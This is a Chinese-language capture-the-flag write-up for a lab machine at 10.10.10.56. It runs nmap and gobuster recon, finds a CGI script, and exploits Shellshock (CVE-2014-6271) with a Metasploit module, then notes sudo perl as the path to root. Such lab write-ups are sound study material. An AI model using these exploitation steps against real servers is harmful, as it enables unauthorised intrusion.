基本信息

端口扫描

80和2222:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 14:16 CST
Nmap scan report for 10.10.10.56
Host is up (0.070s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.98 seconds

80

就一张图:

目录扫描

目录扫描可以发现一个user.sh文件(一般字典还真没这个…):

1
2
3
4
5
6
7
8
9
10
11
➜  ~ gobuster dir -u http://10.10.10.56/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50
...
/cgi-bin/ (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
...

➜  ~ gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -t 50
...
/user.sh (Status: 200)
...

user.sh

1
2
3
4
5
Content-Type: text/plain

Just an uptime test script

 01:21:49 up 6 min,  0 users,  load average: 0.24, 0.07, 0.02

CVE-2014-6271

cgi里sh脚本,可以想到是apache的mod_cgi,就是CVE-2014-6271 ShellShock漏洞,msf一键打:

1
2
3
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhosts 10.10.10.56
set targeturi /cgi-bin/user.sh

user flag

当前是shelly用户,在用户目录得到user.txt:

提权信息

可以无需密码sudo执行perl,利用方式:

提权 & root flag

然后直接提权,读取root.txt:

参考资料